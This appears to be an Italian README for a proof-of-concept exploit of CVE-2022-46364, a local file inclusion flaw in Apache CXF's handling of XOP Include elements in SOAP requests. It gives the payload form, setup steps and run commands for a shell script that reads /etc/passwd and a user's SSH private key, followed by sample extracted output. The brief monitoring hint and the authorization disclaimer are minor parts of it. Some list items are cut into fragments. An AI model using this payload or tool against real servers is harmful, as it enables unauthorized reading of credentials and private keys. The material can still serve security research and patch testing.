
Proof-of-concept exploit per CVE-2022-46364, una vulnerabilità di inclusione locale di file in Apache CXF tramite elementi XOP Include appositamente costruiti nelle richieste SOAP, che consente la lettura arbitraria di file.
Questo repository contiene un exploit Proof-of-Concept (PoC) per CVE-2022-46364, una vulnerabilità di Local File Inclusion (LFI) in Apache CXF.
La vulnerabilità nasce dalla gestione impropria degli elementi XOP (XML-binary Optimized Packaging) Include nelle richieste SOAP, consentendo agli attaccanti di leggere file arbitrari dal server.
Apache CXF elabora impropriamente gli elementi <xop:Include> all'interno delle richieste SOAP.
Fornendo un href appositamente modificato (ad es., file:///etc/passwd), il server potrebbe includere e restituire il contenuto di file locali.
Verificare sempre la versione vulnerabile esatta nel proprio ambiente target.
<xop:Include href="file:///path/to/file">.
├── cxf_lfi.sh # Script exploit
├── README.md # Documentazione
├── LICENSE # Licenza MIT
└── .gitignore
chmod +x cxf_lfi.sh
Aggiornare il target all'interno dello script:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Alcuni server potrebbero:
file://L'analisi dell'output dipende dal formato della risposta e potrebbe richiedere un'ispezione manuale.
Monitorare richieste SOAP anomale contenenti:
<xop:Include>file:// URIsQuesto progetto è inteso per:
Non utilizzare questo strumento su sistemi senza autorizzazione esplicita.
Sviluppato come parte della ricerca sulla sicurezza e della pratica CTF.